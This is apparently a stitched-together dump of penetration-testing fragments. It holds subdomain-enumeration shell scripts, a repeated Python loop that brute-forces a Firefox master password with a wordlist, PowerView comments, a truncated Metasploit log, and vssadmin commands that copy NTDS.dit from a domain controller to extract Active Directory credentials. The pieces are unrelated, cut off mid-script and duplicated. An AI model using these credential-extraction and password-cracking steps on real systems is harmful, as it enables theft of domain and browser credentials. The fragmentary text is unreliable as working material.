fb11

#!/bin/bash
#@cihanmehmet tweets, @cihanmehmets
if [[ $# -eq 0 ]] ;
then
	echo "Usage: ./sub.sh findname2.com"
	exit 1
else
curl 'https://crt.sh/?q=%.'$1'&output=json' | jq '.[] | {name_value}' | sed 's/\"//g' | sed 's/\*\.//g' | sort -u |grep "name_value"|cut -d ' ' -f4 > $1.txt

curl -s "http://web.archive.org/cdx/search/cdx?url=*."$1"/*&output=text&fl=original&collapse=urlkey" |sort| sed -e 's_https*://__' -e "s/\/.*//" -e 's/:.*//' -e 's/^www\.//' | uniq >>$1.txt

fb11

#!/bin/bash
if [[ $# -eq 0 ]] ;
then
echo "Usage: ./crt.sh domainname"
exit 1
else
curl 'https://crt.sh/?q=%.'$1'&output=json' | jq '.name_value' | sed 's/\"//g' | sed 's/\*\.//g' | sort -u > $1.txt
cat $1.txt
fi

fb11

The Web Application Hacker's Handbook

Web Application Hacker's Handbook Task checklist as a Github-Flavored Markdown file

Contents

• Recon and analysis
• Test handling of access
• Test handling of input
• Test application logic
• Assess application hosting
• Miscellaneous tests

fb11

Penetrating Testing/Assessment Workflow & other fun infosec stuff

https://github.com/jivoi/pentest

My feeble attempt to organize (in a somewhat logical fashion) the vast amount of information, tools, resources, tip and tricks surrounding penetration testing, vulnerability assessment, and information security as a whole*

• Reconnaissance
  • Passive/Semi-Passive
    • Tools
• Discover - https://github.com/leebaird/discover

fb11

#!/usr/bin/python

import sys
from subprocess import Popen, PIPE
#Usage python masterkey.py rockyou.txt
f = open(sys.argv[1], 'r')
for line in f:
    password = line.strip()
    p = Popen(['./firepwd.py','-p',password,'-d','./'], stdout=PIPE)
    output = p.stdout.read()

fb11

#!/usr/bin/python

import sys
from subprocess import Popen, PIPE
#Usage python masterkey.py rockyou.txt
f = open(sys.argv[1], 'r')
for line in f:
    password = line.strip()
    p = Popen(['./firepwd.py','-p',password,'-d','./'], stdout=PIPE)
    output = p.stdout.read()

fb11

#!/usr/bin/python

import sys
from subprocess import Popen, PIPE
#Usaeg python masterkey.py rockyou.txt
f = open(sys.argv[1], 'r')
for line in f:
    password = line.strip()
    p = Popen(['./firepwd.py','-p',password,'-d','./'], stdout=PIPE)
    output = p.stdout.read()

fb11

# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
#   tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c

# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
#   https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

# New function naming schema:
#   Verbs:
#       Get : retrieve full raw data sets
#       Find : ‘find’ specific data entries in a data set

fb11

Microsoft stores the Active Directory data in tables in a proprietary ESE database format. The database is contained in the NTDS.dit (%SystemRoot%\ntds\NTDS.dit) file.
This file is encrypted to prevent any data extraction, so we will need to acquire the key to be able to perform the extraction of the target data.
The required Password Encryption Key is stored in the NTDS.dit file, but is encrypted itself with the BOOTKEY.
To obtain this BOOTKEY, we need to acquire a copy of the SYSTEM registry hive (%SystemRoot%\System32\config\System) from the same Domain Controller as we acquired the NTDS.dit file.

Extract NTDS/SYSTEM from a domain controller:
    net start vss
    vssadmin create shadow /for=c:
    vssadmin list shadows
    copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit C:\temp

fb11

Script started on Sun 28 Aug 2016 04:19:27 PM CEST

[*] Starting the Metasploit Framework console.../
[*] Starting the Metasploit Framework console...-
[*] Starting the Metasploit Framework console...\
[*] starting the Metasploit Framework console...|
[*] STarting the Metasploit Framework console.../
[*] StArting the Metasploit Framework console...-
[*] StaRting the Metasploit Framework console...\
[*] StarTing the Metasploit Framework console...|